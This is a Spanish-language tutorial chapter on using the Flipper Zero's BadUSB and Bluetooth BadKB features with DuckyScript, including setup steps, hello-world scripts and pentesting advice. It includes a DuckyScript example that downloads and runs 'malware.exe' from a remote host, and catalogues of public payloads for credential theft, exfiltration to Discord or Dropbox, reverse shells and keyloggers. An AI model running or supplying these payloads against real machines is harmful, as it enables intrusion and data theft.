Bienvenidos a un nuevo capítulo de este Curso Gratis de Hardware para Hackers. Guía de Flipper Zero: Hacking con BadUSB. Comparte este articulo y síguenos para recibir más capítulos, guías y cursos gratis.

Este curso está en un ciclo de crecimiento y mejora constante. Tendrá revisiones y actualizaciones anuales y correcciones y mejoras mensuales. Agradecemos su apoyo difundiendo, compartiendo, comentando o simplemente leyéndolo.

Para saber más comente a continuación, respondemos todos y cada uno de los comentarios. Las recomendaciones y solicitudes de tutoriales siempre son bienvenidas.

Nos esforzamos por proporcionar artículos informativos; sin embargo, es importante que los lectores se aseguren de que su investigación sea ética y responsable. Además, es su responsabilidad asegurarse de cumplir con todas las leyes y regulaciones aplicables en su región. La información proporcionada en este artículo está destinada únicamente a fines educativos.

Table of Contents

¿Te gustaría enterarte de cuando lanzamos descuentos y nuevos cursos?

El Flipper Zero es un dispositivo multifuncional popular entre entusiastas de la seguridad y el hacking, que permite explorar y experimentar con diversas tecnologías de radiofrecuencia, protocolos de comunicación y dispositivos de control. Una de las capacidades avanzadas del Flipper Zero es su función BadUSB, que permite al dispositivo actuar como un teclado USB programable para ejecutar scripts de ataque. A continuación, se presenta una descripción detallada de la función BadUSB en el Flipper Zero, sus aplicaciones y las consideraciones de seguridad asociadas.

Flipper Zero puede actuar como un dispositivo BadUSB , reconocido por las computadoras como un dispositivo de interfaz humana (HID), como un teclado. Un dispositivo BadUSB puede cambiar la configuración del sistema, abrir puertas traseras, recuperar datos, iniciar shells inversos o hacer cualquier cosa que se pueda lograr con acceso físico. Se hace ejecutando un conjunto de comandos escritos en el lenguaje de script Rubber Ducky , también conocido como DuckyScript.

Este conjunto de comandos también se denomina carga útil.Inserte una tarjeta microSD para usar la aplicación Bad USBAntes de usar la aplicación Bad USB, asegúrese de actualizar el firmware de Flipper Zero con una tarjeta microSD insertada, ya que Flipper Zero almacena bases de datos en una tarjeta microSD.

¿Qué es BadUSB?

¿Es un pájaro? No

¿Es un avión? No

¿Es un USB? Tal vez…

¿Es un ratón? De alguna manera…

¿Es un teclado? Normalmente sí… ¿o tal vez no?

Básicamente, el BadUSB es un dispositivo respaldado por Arduino que puede interpretar un mouse y un teclado.

BadUSB es un tipo de ataque en el que un dispositivo USB se disfraza como un teclado para enviar comandos maliciosos a una computadora de manera rápida y automatizada. Este tipo de ataque puede ser usado para comprometer sistemas, extraer datos, instalar malware, entre otras actividades maliciosas.

Características de BadUSB en Flipper Zero

  1. Script Personalizable: Los usuarios pueden escribir y cargar scripts personalizados en Flipper Zero para ejecutar una serie de comandos predefinidos cuando el dispositivo se conecta a una computadora.
  2. Compatibilidad Multi-Plataforma: Los scripts pueden ser diseñados para funcionar en múltiples sistemas operativos, incluyendo Windows, macOS y Linux.
  3. Interfaz Sencilla: Flipper Zero ofrece una interfaz amigable que permite a los usuarios cargar y ejecutar scripts BadUSB de manera fácil y rápida.

Ejemplos de Uso

  1. Recopilación de Información: Scripts que automatizan la recopilación de información sensible del sistema objetivo, como credenciales, archivos de configuración, etc.
  2. Instalación de Software: Automatización de la descarga e instalación de software malicioso en el sistema objetivo.
  3. Ejecución de Comandos: Ejecución de comandos del sistema que pueden cambiar configuraciones, crear usuarios administrativos ocultos, etc.
  4. Exfiltración de Datos: Scripts que extraen y envían datos sensibles a servidores remotos.

Ejemplo de Script BadUSB

bashCopiar códigoREM Script BadUSB de ejemplo para Flipper Zero
DELAY 500
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING Invoke-WebRequest -Uri http://example.com/malware.exe -OutFile C:\Users\Public\malware.exe
ENTER
DELAY 1000
STRING Start-Process "C:\Users\Public\malware.exe"
ENTER

Consideraciones de Seguridad

Riesgos de Seguridad

  1. Acceso No Autorizado: Si un Flipper Zero con scripts maliciosos cae en manos equivocadas, puede ser utilizado para comprometer sistemas y redes.
  2. Ingeniería Social: Los atacantes pueden utilizar tácticas de ingeniería social para hacer que las víctimas conecten el dispositivo a sus computadoras.
  3. Detección y Mitigación: Las soluciones de seguridad avanzadas pueden detectar y mitigar ataques BadUSB, pero no todos los sistemas están preparados para ello.

Buenas Prácticas

  1. Control de Acceso: Mantener el Flipper Zero bajo control y limitar su acceso solo a personal autorizado.
  2. Pruebas Éticas: Utilizar la función BadUSB únicamente en entornos controlados y con el consentimiento explícito para pruebas de seguridad.
  3. Educación y Concienciación: Educar a los usuarios sobre los riesgos de conectar dispositivos USB desconocidos a sus sistemas.
  4. Actualizaciones de Seguridad: Mantener los sistemas y el software de seguridad actualizados para protegerse contra nuevas variantes de ataques BadUSB.

Lenguaje de programación Flipper Zero

Antes de utilizar Flipper Zero como dispositivo BadUSB, debe escribir un payload en formato .txt en cualquier editor de texto ASCII común que utilice el lenguaje de programación. Flipper Zero puede ejecutar la sintaxis de programación Rubber Ducky extendida. La sintaxis es compatible con el lenguaje de programación Rubber Ducky 1.0 clásico , pero proporciona comandos y funciones adicionales, como el método de entrada ALT+Numpad, el comando SysRq y más. Para obtener más información sobre el lenguaje de script Flipper Zero, consulte esta página.

Cómo cargar nuevas payloads en tu Flipper Zero

Una vez creada la carga útil, puedes cargarla en tu Flipper Zero a través de qFlipper o la aplicación Flipper Mobile en la carpeta SD Card/badusb/ . Las nuevas cargas útiles estarán disponibles en la aplicación Bad USB.

Cómo usar Flipper Zero como dispositivo BadUSB

Para utilizar su Flipper Zero como un dispositivo BadUSB, haga lo siguiente:

1 Si la aplicación qFlipper se está ejecutando en su computadora, cierre la aplicación.

2 En su Flipper Zero, vaya a Menú principal -> USB defectuoso.

3 Seleccione la carga útil y presione el botón OK.

4 Modifique la distribución del teclado presionando el botón IZQUIERDO, si es necesario. La configuración predeterminada es la distribución del teclado en inglés de EE. UU.

5 Conecte su Flipper Zero a la computadora mediante un cable USB.

6 Presione Ejecutar para ejecutar la carga útil en la computadora.

Aplicaciones usb oficiales para Flipper Zero

Mass Storage

USB Consumer Control

  • USB Consumer Control logo USB Consumer Control for USB USBUSB Consumer Control
  •  Information about application
    • Author: piraija
    • Version: 1.0
    • Updated at: 2024-03-05
    • Downloads: 0
     Read more and install

BarCode ScannerE

  • BarCode ScannerE logo BarCode ScannerE for USB USBEmulates a barcode scanner for testing cash registers. Why buy a scanner when you have a flipper?
  •  Information about application
    • Author: Check repoVersion: 0.3Updated at: 2024-03-05Downloads: 0
     Read more and install

Repositorios y recursos

Libera el poder de tu Flipper / BadUSB:

Mr Proxy

https://github.com/Mr-Proxy-source/BadUSB-Payloads

PayloadsDescriptionPlug’n’PlayAuthor
Script-PasterCopy payload from the link then paste it in few powershell in seconds.MrProxy
LazagneGrabbing passwords and credentials from vulnerable systems.MrProxy
DownloaderDownload file from your url and then execute it on targets system.MrProxy
PHPexfilGather essential information such as computer name, hardware ID,…MrProxy
IOS-WebsiteOpen your desired website on iOS 17 and older versions!MrProxy
Google-ExfilUpload Google Data to gofile.io and sends link to desired platform.MrProxy

My Flipper Shits

https://github.com/aleff-github/my-flipper-shits?tab=readme-ov-file

SystemCategoryNamePAP
WindowsCredentialsWiFi Windows Passwords🟡
WindowsCredentialsDefend Yourself From CVE-2023-23397🟢
WindowsExfiltrationExfiltrate Windows Product Key🟡
WindowsExfiltrationExfiltrate Process Info – Windows🟡
WindowsExfiltrationProtonVPN config🟡
WindowsExfiltrationWindows netstat🔴
WindowsExfiltrationExfiltrate Computer Screenshots🟡
WindowsExfiltrationExport Cookies From Firefox🟡
WindowsExfiltrationExports all the links of the downloads🟡
WindowsExfiltrationTree structure of the operating system🟡
WindowsExfiltrationExport all saved certificates with Adobe Reader🟡
WindowsExfiltrationExfiltrates the entire database of the Notion client🟡
WindowsExfiltrationCreate And Exfiltrate A Webhook Of Discord🟡
LinuxExfiltrationExfiltrate Process Info – Linux🟡
LinuxExfiltrationExfiltrate Network Traffic🟡
LinuxExfiltrationExfiltrate Linux Documents🟡
LinuxExfiltrationExfiltrate Linux Logs🟡
LinuxExfiltrationExfiltrate Network Configuration🟡
LinuxExfiltrationExfiltrate Email And Password By Phising🟡
LinuxExfiltrationExfiltrate Sudo Password By Phishing🟡
LinuxExfiltrationExfiltrate WiFi Passwords🟡
LinuxExfiltrationExfiltrate Photos Through Shell🟡
WindowsExfiltrationSave Your Thunderbird Settings🟡
LinuxPhisingStandard Phishing Attack🟡
LinuxPhisingStandard Phishing Payload Using kdialog🟡
LinuxExecutionSet An Arbitrary And Persistent Tor Circuit🟡
WindowsExecutionSet An Arbitrary And Persistent Tor Circuit🟡
WindowsExecutionSet Tor Bridge🟡
LinuxExecutionExploiting An Executable File🟢
LinuxExecutionChange MAC Address🟡
LinuxExecutionSet Arbitrary VPN🟡
WindowsExecutionClose All Applications🟢
LinuxExecutionChange Network Configuration🟡
LinuxExecutionEdit The Default Real App With An Arbitrary🟡
WindowsExecutionUninstall Signal🟢
WindowsExecutionSet An Arbitrary DNS – IPv4 version🟢
WindowsExecutionAdd An Excepiton To Avast Antivirus🟢
WindowsExecutionMake Windows performant (but ugly and boring)🟢
WindowsExecutionChange Windows User Name🟡
WindowsExecutionStarting a PowerShell with administrator permissions in Windows🟢
WindowsExecutionChange the password of the Windows user🟡
WindowsExecutionStop A Single Process In Windows🟡
WindowsExecutionUninstall A Specific App On Windows Through Control Panel🟡
LinuxExecutionPersistent Reverse Shell – Telegram Based🟡
LinuxExecutionTelegram Persistent Connection Linux🟡
LinuxExecutionPersistent Keylogger – Telegram Based🟡
LinuxExecutionChange Git Remote Link🟡
WindowsExecutionChange Git Remote Link🟡
WindowsExecutionSend Messages In Discord Channel-Server🟡
WindowsExecutionInstall And Run Any Arbitrary Executable – No Internet And Root Needed🟡
LinuxExecutionDefend yourself against AtlasVPN bugdoor🟡
LinuxPrankChange Desktop Wallpaper🟡
WindowsPrankSend Signal Messages🟡
WindowsPrankSend Microsoft Teams Messages🟡
WindowsPrankNever Gonna Give You Up🟢
LinuxPrankSend Telegram Messages🟡
LinuxPrankChange The App That Will Be Runned🟡
WindowsPrankAlien Message From Computer🟢
WindowsPrankContinuous Print In Terminal🟢
WindowsPrankChange Wallpaper With Screenshot🟡
WindowsPrankPlay A Song Through Spotify🟢
WindowsPrankFull-Screen Banner Joke🟢
WindowsPrankThe Mouse Moves By Itself🟡
WindowsPrankTry To Catch Me🟡
WindowsPrankFollow Someone On Instagram🟡
LinuxPrankPranh(ex)🟢
WindowsPrankSend Email Through Thunderbird🟢
IOSPrankSend Email Through Thunderbird🟢
IOSPrankChange Github Profile Settings🟡
IOSPrankPlay A Song With An iPhone🟡
IOSPrankCall Someone With An iPhone🟡
LinuxPrankEdit A Reminder With An iPhone🟡
LinuxPrankDelete A Reminder With An iPhone🟡
LinuxPrankKali Linux – This_damn_shell_doesn_t_work… so_sad!🟢
LinuxPrankLinux – This_damn_shell_doesn_t_work… so_sad!🟢
WindowsPrankPrank In The Middle – Thunderbird🟢
LinuxIndicent ResponseAuto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273🔴
LinuxIndicent ResponseExploit Citrix NetScaler ADC and Gateway through CVE-2023-4966🔴
WindowsIndicent ResponseExploit Citrix NetScaler ADC and Gateway through CVE-2023-4966🔴
WindowsIncident ResponseDefend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability🟢
//PrankFlipper Zero GIF🟢

PowerShell Functions For Hackers

https://github.com/I-Am-Jakoby/PowerShell-for-Hackers

FunctionsDescription
Detect Mouse MovementUsed to find out if target stepped away or came back to their PC.
Set-VolumeUsed to set the volume of the targets PC.
PlaySoundUsed to play a sound file from the console window.
Minimize-AppsUsed to minimize all the apps on your targets screen.
Set-WallPaperUsed to change the targets desktop wallpaper.
Hide-MsgUse steganography to hide a secret message in an image.
MsgBoxUse this function to make a generic pop up message box.
SpeakUsed to turn text to speech and talk through your targets speakers.
Clean-ExfilThis function is to erase any trace of you after wreaking havok on your target.
If-AdminThis function is to test if your target is an Admin, If $True run a secondary function.
Invoke-WebRequestThis function is used to either download or upload files or data.
NS-LookupThis function is used to download and execute payloads from DNS TXT Records
DropBox-UploadThis function is used to upload «aquired» files to Dropbox.
Discord-UploadThis function is used to upload «aquired» files to Discord.
PowerShell-2-BatchThis function is used to convert PowerShell scripts to a .BAT file.
B64-textThese functions are used to either encode/decode scripts in Base64.
B64-imgThese functions are used to either encode/decode images in Base64.
TXT-imgThis function is used to convert a word document to an image.
Abuse-CapsLockUse the capslock to act as an indicator for script progression.
Add-NetworkUse this function to add a network profile to your targets PC. Either SECURED or OPEN.
Wifi-PassUse these functions to enumerate your targets wifi and get their wifi passwords.
Get-GeoLocationUse this function to get the Geo-Location of your target.
Get-BrowserDataUse this function to get the browser history and bookmarks from browsers

Libera el poder de tu Flipper

https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB

PayloadsDescriptionPlug’n’PlayAuthor
VoiceLoggerActivates your target’s microphone, converts their speech to text, and exfils it to Discord.Jakoby
Evil-GooseA payload that hires a goose to hack your target in real time.Jakoby
ADV-ReconA script used to do an advanced level of recon on the target’s computer.Jakoby
AcidBurnA script I put together to be used on your friends or foes. Prepare to be roasted.Jakoby
Jump-ScareJust a little jumpscare that changes the target’s wallpaper.Jakoby
Jump-Scare V2Just a little jumpscare that plays a video in the target’s PowerShell console.Jakoby
ADV-RickRollRickRoll that plays in the PowerShell console after a mouse movement is detected.Jakoby
PineAppleConnect a target’s PC to your WiFi PineApple.Jakoby
Play-WAVDownload a WAV file and play it after a mouse movement is detected.Jakoby
Rage-Pop-UpsGenerates an infinite loop of insulting pop-ups.Jakoby
SubscribeUsed to make your target subscribe to your YouTube channel.Jakoby
Must SubA script used to make your target subscribe to 15 of Jakoby’s favorite YouTube channels.Jakoby
PS-DrawA script used to generate and draw images in the PowerShell window.Jakoby
WallPaper-TrollCollects sensitive info from your target and displays it as their wallpaper to taunt them.Jakoby
WallPaper-URLSets the target’s wallpaper to an image you provide via a URL after a mouse movement is detected.Jakoby
We-Found-YouOpens a map with your target’s current location on it.Jakoby
YT-TripwireOpens any YouTube video after a mouse movement is detected.Jakoby
Credz-PlzA script used to prompt the target to enter their credentials to later be exfiltrated.Jakoby
Shortcut JackerA script used to embed malware in the shortcut on your target’s desktop.Jakoby
Wifi GrabberGrabs your target’s WiFi passwords and uploads them to either Dropbox, Discord, or both.Jakoby
IP GrabberGrabs your target’s IP addresses and uploads them to either Dropbox, Discord, or both.Jakoby
Browser DataThis payload can be used to retrieve the browsing history and bookmarks of your target.Jakoby

Lo que BadUSB puede hacer en Flipper Zero

En el vídeo de la publicacion de mi tweet, puedes ver una de las aplicaciones de demostración que vienen preinstaladas en el Flipper Zero. Esta aplicación muestra una introducción a la aplicación BadUSB y explica cómo funciona. Simplemente selecciona la aplicación en el Flipper Zero y conéctala a una computadora; esta la identificará como un teclado y comenzará a aceptar entradas de inmediato.

Hay cientos de scripts predefinidos que puedes ejecutar en Flipper Zero y que hacen todo tipo de cosas, desde trollear a tus amigos hasta robar información. He visto un montón de scripts BadUSB con los que puedes proporcionar un token de Discord, que podrán acceder a Internet y usar la API de Discord para enviar información sobre esa computadora a un servidor privado que estés alojando.

Una lista no exhaustiva de algunas de las cosas que he visto que puedes hacer con Flipper Zero y BadUSB es la siguiente:

  • Cambiar el fondo de pantalla de una PC
  • Suscribirse a un canal de YouTube
  • Obtener contraseñas de Wi-Fi desde una computadora
  • Recuperar datos del navegador de una computadora

Todo esto es posible gracias a que Flipper Zero emula un teclado, lo que significa que puede hacer en tu computadora todo lo que un teclado haría normalmente. Lo más notable es que eso significa ingresar pulsaciones de teclas y también puede escribir mucho más rápido que un humano normal. Puedes divertirte mucho con él, pero también es una herramienta bastante peligrosa en las manos equivocadas.

Flipper Zero + BadUSB (Ducky Script)

Es fundamental recordar que esta información es solo para fines educativos. El uso indebido de esta información para actividades maliciosas o acceso no autorizado es ilegal y poco ético. El objetivo de este tutorial es fomentar el uso responsable, el hacking ético y la investigación en ciberseguridad.

Paso 1: Familiarícese con el Flipper Zero

Antes de comenzar a escribir un script Ducky para BadUSB, es imprescindible familiarizarse con Flipper Zero y sus diversas funciones. Puede encontrar información detallada en el manual de usuario de Flipper Zero y en el sitio web oficial.

Paso 2: Comprenda los conceptos básicos de BadUSB

BadUSB se basa en el hecho de que muchas computadoras modernas confían inherentemente en los dispositivos USB. Un ataque BadUSB aprovecha esta confianza para hacerse pasar por dispositivos HID como teclados y ratones. Una vez conectado a una computadora, un dispositivo BadUSB puede enviar pulsaciones de teclas o acciones del ratón, lo que puede dar lugar a varios tipos de ataques.

Paso 3: Configuración del entorno de desarrollo de Flipper Zero

Para escribir e implementar un script en Flipper Zero, debe configurar un entorno de desarrollo adecuado. Se recomiendan sistemas basados ​​en Unix, como Linux o macOS, para el desarrollo, pero también puede configurarlo en Windows.

Para escribir y editar scripts, es necesario contar con un editor de texto o un entorno de desarrollo integrado (IDE). Visual Studio Code, Atom o Sublime Text, Notepad++ son algunas buenas opciones.

Paso 4: Escribe tu guión de Ducky

Aquí viene la parte crucial: escribir el script Ducky. A diferencia de Python, Ducky Script es un lenguaje de programación simple y fácil de usar diseñado específicamente para dispositivos USB Rubber Ducky. Utiliza una sintaxis simple para generar pulsaciones de teclas.

A continuación se muestra un ejemplo de un script Ducky simple que escribe «¡Hola, mundo!» en la ventana o terminal activa:

DELAY 1000 
STRING Hola, mundo!
ENTRAR

Este script primero establece un retraso, luego escribe una cadena de texto y, por último, envía la pulsación de la tecla ENTER. Puedes ampliar este script agregando más comandos y retrasos según la documentación de Ducky Script.

Paso 5: prueba tu script

Antes de implementar su script, es importante probarlo. Utilice un entorno controlado donde pueda verificar su comportamiento de forma segura. Asegúrese de que su script no provoque daños involuntarios ni acceso no autorizado a los sistemas.

Paso 6: Implementa tu script

Después de probar a fondo el script, puedes implementarlo en Flipper Zero. El proceso implica convertir el Ducky Script en una carga binaria, que luego se puede transferir a Flipper Zero siguiendo la documentación oficial.

Escribir un script Ducky para Flipper Zero proporciona información valiosa sobre los protocolos USB y la ciberseguridad. Sin embargo, es fundamental utilizar este poder de manera responsable y ética. El objetivo final de aprender sobre estas tecnologías debería ser mejorar la seguridad, no explotar vulnerabilidades con fines maliciosos.

Aprovechar BADUSB en Flipper Zero para realizar pentesting

Las pruebas de penetración han evolucionado hasta convertirse en un aspecto esencial de la seguridad cibernética para cualquier organización. Con amenazas y vulnerabilidades en constante evolución, los pentesters están adoptando y empleando varias herramientas innovadoras para realizar estas pruebas, identificar lagunas y proteger los sistemas.

Analizaremos cómo utilizar el Bad USB en Flipper Zero para realizar pruebas de penetración de manera efectiva. Si desea ampliar las capacidades de su Flipper Zero, puede agregar la placa de desarrollo Wifi. Flipper Zero ha demostrado ser una herramienta potente para quienes trabajan en el campo de las pruebas de penetración, ya que su naturaleza práctica y portátil ayuda a identificar y corregir vulnerabilidades de seguridad.

Por otro lado, Bad USB es un tipo de ataque que aprovecha el hecho de que muchos dispositivos USB son, en esencia, pequeñas computadoras que se pueden reprogramar. En un ataque Bad USB, se reescribe el firmware de un dispositivo USB, lo que hace que el dispositivo se comporte de maneras que el usuario no esperaría. Por ejemplo, una memoria USB podría programarse para que actúe como un teclado e ingrese comandos en la computadora conectada, lo que le permitiría a un atacante obtener acceso o datos no autorizados.

Utilización de USB defectuoso en Flipper Zero para pentest

La función Bad USB de Flipper Zero permite a los pentesters emular la entrada del teclado, lo que puede ser un método de prueba poderoso para determinar la susceptibilidad de un sistema a este tipo de ataques. A continuación, se muestra cómo se puede utilizar:

1. Configuración de Flipper Zero:

El primer paso consiste en configurar el dispositivo Flipper Zero. Para ello, hay que conectarlo al ordenador y comprobar que esté completamente cargado y en funcionamiento. La interfaz de usuario es intuitiva, lo que permite configurarlo incluso a personas con pocos conocimientos técnicos.

2. Programación del Flipper Zero:

El siguiente paso consiste en programar el Flipper Zero con la entrada deseada. En un ataque Bad USB, el dispositivo se programaría para introducir pulsaciones de teclas o comandos que permitirían el acceso no autorizado. Como parte de una prueba de penetración ética, estos comandos podrían implicar acciones inofensivas como abrir aplicaciones de bloc de notas o calculadora, o más complejas como descargar y ejecutar scripts, pero el objetivo final sería destacar la amenaza potencial.

3. Implementación de la prueba:

Una vez programado el Flipper Zero, el siguiente paso es conectarlo al sistema que se está probando. Como el Flipper Zero puede imitar una unidad USB estándar, la mayoría de los sistemas deberían aceptarlo fácilmente.

Al insertarlo, Flipper Zero comienza a ejecutar las pulsaciones de teclas o los comandos programados. El evaluador puede observar la respuesta del sistema y documentar cualquier vulnerabilidad de seguridad.

4. Análisis y Rectificación:

Después de la prueba, el pentester debe analizar los resultados y hacer recomendaciones adecuadas para corregir las vulnerabilidades. Esto podría implicar reforzar las políticas de seguridad, implementar firewalls robustos o educar a los empleados sobre los posibles riesgos de los dispositivos USB no autorizados.

ATAQUES BADUSB INALÁMBRICOS CON FLIPPER ZERO

¿Qué pasaría si te dijéramos que el Ataque “BAD USB” podría realizarse sin el elemento “USB”, únicamente a través de Bluetooth, sin ningún truco?

Gracias a la gente detrás del firmware Xtreme Custom para Flipper Zero, que le ha dado vida a este concepto oficialmente Ultra-Dope: el reino de badUSB (o BadUSB, o USB Rubber Ducky) ha pasado por un cambio de paradigma absolutamente revolucionario a partir de este hecho. El ataque badUSB, a través de Bluetooth, sin USB, sin ningún módulo GPIO externo, ¡directamente desde Flipper Zero!

Paso 1: Instalar el firmware personalizado ‘Xtreme’

Instalar Xtreme Firmware. Tiene funciones, control y personalización de nivel superior con un código altamente optimizado en comparación con otros firmwares personalizados importantes que existen. Este es el único firmware personalizado en este momento con badUSB sobre Bluetooth (ahora llamado BadKB).

Paso 2: Uso

Abra la aplicación “Bad KB” en su Flipper Zero. Anteriormente, esta aplicación se llamaba “Bad USB”.

A continuación, seleccione cualquier payload badUSB guardada para probar. Asegúrese de que este payload sea relativamente inofensiva y de que sepa lo que está haciendo. Una vez seleccionada, debería ver una pantalla como la siguiente.

Aquí, navega hasta la página “Configuración” presionando el botón izquierdo del D-pad. ¿Notas algo diferente? ¡Ahora puedes seleccionar entre “BT” y “USB” para el ataque BadKB!

Tan pronto como cambie a la opción “BT”, el Flipper Zero comenzará a transmitirse a otros dispositivos como un teclado Bluetooth.

Incluso puedes cambiar el nombre que se transmite seleccionando la opción “Nombre del dispositivo BT”. Imagínate falsificar un “altavoz” Bluetooth en una fiesta con un nombre como…

Ahora solo queda emparejar el Flipper Zero con la máquina “víctima” a través de Bluetooth, que, sorprendentemente, no tiene mecanismo de verificación. ¡Solo un clic y ya está emparejado!

Ahora, en el Flipper Zero, notarás que la pantalla de carga ha cambiado y está lista para ejecutarse. Presiona el botón central del pad direccional para ejecutar la carga en el dispositivo conectado.

Recuerde utilizar cargas útiles relativamente inofensivas mientras realiza pruebas en sus máquinas. ¡Un Rick Roll es mucho menos vergonzoso que perder la mitad de su sistema de archivos por culpa de un simpático dispositivo con temática de delfín!

Descargo de responsabilidad: esto existe con fines educativos, de investigación y de experimentación con dispositivos de su propiedad. No respaldamos ni nos hacemos responsables de ninguna actividad potencialmente poco ética o maliciosa derivada del uso que usted haga de este sitio.

Cómo escribir scripts BadUSB para Flipper Zero

Como ya vimos BadUSB en Flipper recibe comandos de scripts codificados en un lenguaje de scripts llamado Ducky Script , un lenguaje de scripts creado y desarrollado por Hak5 . Hak5 también desarrolla herramientas de auditoría de seguridad y pruebas de penetración, como Lan Turtle o WiFi Pineapple.

Cómo conectar su Flipper Zero a la aplicación Flipper

En primer lugar, deberá descargar e instalar la aplicación Flipper, conocida como qFlipper en las tiendas de aplicaciones de escritorio. Esto le permite interactuar con el sistema de archivos del dispositivo y con el dispositivo en sí.

¡La forma más fácil de hacerlo es probablemente a través de la imagen de firmware oficial de Flipper Zero!

Paso 1: Vaya a la aplicación BadUSB en las aplicaciones después de presionar el botón central. 

NOTA: Si se encuentra con un error como el que se muestra a continuación, desconecte el Flipper Zero de su computadora y APAGUE el Bluetooth en el dispositivo presionando el Botón central > Configuración > Bluetooth > Botón direccional izquierdo hasta que Bluetooth diga APAGADO

Paso 2: Se le presentará una lista de scripts instalados previamente. Con el botón central, elija la opción que refleje su sistema operativo install_qFlipper_<SU SISTEMA OPERATIVO> (Windows o Mac) 

Una vez instalado qflipper, tendrá acceso al sistema de archivos del dispositivo, lo cual es crucial para configurar las cargas útiles de BadUSB para que se ejecuten.

Cómo escribir tu primer guión de Ducky

Lo creas o no, ¡ya ejecutaste tu primer script Ducky cuando instalaste qFlipper en el paso anterior! Dicho esto, puedes ver lo fácil que es ejecutar una carga útil de este tipo cuando tienes acceso físico a un dispositivo. Incluso podemos acceder a un dispositivo de forma remota para inyectar pulsaciones de teclas, pero lo abordaremos en otra publicación pronto 🙂

Como se mencionó, Ducky Script es un lenguaje de programación muy legible y fácil de entender que se puede usar para una variedad de tareas, incluso fuera del hacking. Muchos lo usan para automatizar la instalación de software y sistemas operativos, extraer información del dispositivo rápidamente en busca de problemas.

Pero, ¿cómo lo hace el script? La clave es un dispositivo que el sistema operativo identificará como un dispositivo HID (dispositivo de interfaz humana). Un dispositivo HID es, en términos simples, un dispositivo como un teclado o un ratón que el ser humano utiliza para interactuar con el sistema informático.

El Flipper Zero y muchos otros dispositivos pueden mostrarse como un dispositivo HID ante un sistema operativo. Esto significa que el sistema operativo aceptará la entrada del Flipper Zero como si este fuera una persona que controla un teclado o un ratón.

Comencemos

Bien, comencemos conectándonos al Flipper Zero a través de la aplicación qFlipper que acabamos de descargar e instalar.

Paso 1: Abra la aplicación qFlipper en su dispositivo

Paso 2: Conecta el Flipper Zero mediante un cable USB-C.

Ahora que estamos conectados, puedes hacer clic en el ícono en círculo que aparece a continuación para navegar por el sistema de archivos del Flipper Zero. Esto te permitirá copiar/pegar, arrastrar y soltar, o cargar archivos para usar con el hardware del Flipper Zero.

Probablemente deberías tener una tarjeta SD instalada en tu dispositivo. Aquí es donde se almacenan los archivos y desde donde vamos a trabajar.

¡Bien! Ahora que estamos aquí, ¡creemos nuestro primer script Ducky! Aquí voy a utilizar el estándar de programación de “¡Hola mundo!” para demostrar el lenguaje de scripting y las capacidades del dispositivo.

Creando el primer Script

Paso 1: ¡Abre el bloc de notas o el editor de texto que prefieras! Mientras esté en formato de texto simple, cualquier editor de texto funcionará. Puedes usar el Bloc de notas en Windows, Nano o Vi (o Vim o los innumerables editores que existen) en Linux, o TextEdit en MacOS. La clave es tenerlo en formato de texto simple para que no se interprete incorrectamente en función de la codificación.

Paso 2: Copie y pegue el siguiente script en el editor de texto elegido y guarde el archivo localmente.

NOTA: Para fines educativos, proporcionaré el siguiente script que, según el sistema operativo, abrirá una terminal/símbolo del sistema e imprimirá “¡Hola mundo!” en la terminal.

A partir de la línea 1, vemos REM , que es la abreviatura de Observaciones en Ducky Script. Se trata de una forma de comentario y se recomienda utilizarla para que los demás puedan entender qué están haciendo las secciones de tu script si no resulta evidente de inmediato. Siguiendo los comentarios podemos ver el flujo del script y lo que está haciendo.

NOTA: ¿Por qué el retraso ? Aunque el Flipper simula ser un dispositivo HID, procesará los comandos increíblemente rápido. Tan rápido que abrirá la terminal y, antes de que el sistema tenga tiempo de asignar un proceso y abrir la terminal, el Flipper ya habrá enviado el comando desde el teclado.

Probablemente deberías saber que el DELAY se expresa en milisegundos. Por lo tanto, DELAY 1000 equivale a un segundo.

Script de Windows:

REM Un "¡Hola, mundo!" ligeramente más avanzado para Windows
DELAY 3000
REM Abre el cuadro de diálogo Ejecutar
WINDOWS r
DELAY 1000
REM Abre PowerShell con nuestro mensaje
STRING powershell "echo '¡Hola, mundo!'; pause"
ENTER

El script anterior se tomó directamente de la documentación de Ducky Script . Allí puede encontrar un resumen completo de la sintaxis y ejemplos de Ducky Script.

Una vez que tenga guardado el script para su operación específica, es hora de moverlo a su Flipper Zero.

Mover la carga útil y ejecutar el script

¡Bien! Ahora que tenemos nuestro script guardado localmente, lo moveremos al flipper y lo ejecutaremos.

Paso 1: Conecte el flipper a su computadora y abra la aplicación qFlipper

Paso 2: navegue hasta el directorio badusb (Tarjeta SD > badusb)

Paso 3: Haga clic derecho en cualquier lugar dentro de la ventana del directorio y seleccione “Cargar aquí”

Paso 4: Navega hasta donde guardaste tu script y cárgalo en la carpeta badusb. Ahora que está cargado, tendrás que desconectar el cable USB C para poner el Flipper en modo BadUSB.

Paso 5: Presione el botón central en el Flipper y desplácese hacia abajo hasta BadUSB

Paso 6: Desplácese hasta el script que creó y cargó y presione el botón central nuevamente

Paso 7: En este punto, se le solicitará que vuelva a conectar el cable USB C. Vuelva a conectarlo y presione el botón central nuevamente para ejecutar el script. Alternativamente, puede configurarlo para que se ejecute al conectarse presionando el botón central antes de volver a conectar el dispositivo.

¡Listo! ¡Acabas de crear tu primer Ducky Script!

Recomiendo encarecidamente echar un vistazo a la extensa documentación que la gente de Hak5 ha elaborado sobre este lenguaje de programación. ¡No es solo para inyección de pulsaciones de teclas! Puedes cambiar los modos de ataque, emular un dispositivo de almacenamiento y mucho más.

Recuerde utilizar este dispositivo únicamente en dispositivos de su propiedad o con permiso explícito del propietario.

Flipper Zero puede ser bueno y transformar sus flujos de trabajo de TI

En TI, la eficiencia no es solo un objetivo, es esencial. Aquí es donde entra en juego Flipper Zero , un dispositivo multiherramienta que ha llamado la atención con su variedad de funciones de piratería, en particular su capacidad Bad USB. A pesar del nombre ominoso, esta función tiene el potencial de ser una fuerza tremendamente positiva, al agilizar las tareas que tradicionalmente socavan su productividad. Este artículo explora cómo se puede aprovechar la función Bad USB de Flipper Zero para el bien, revolucionando sus procesos y flujos de trabajo.

Transformación de los flujos de trabajo de TI con Flipper Zero

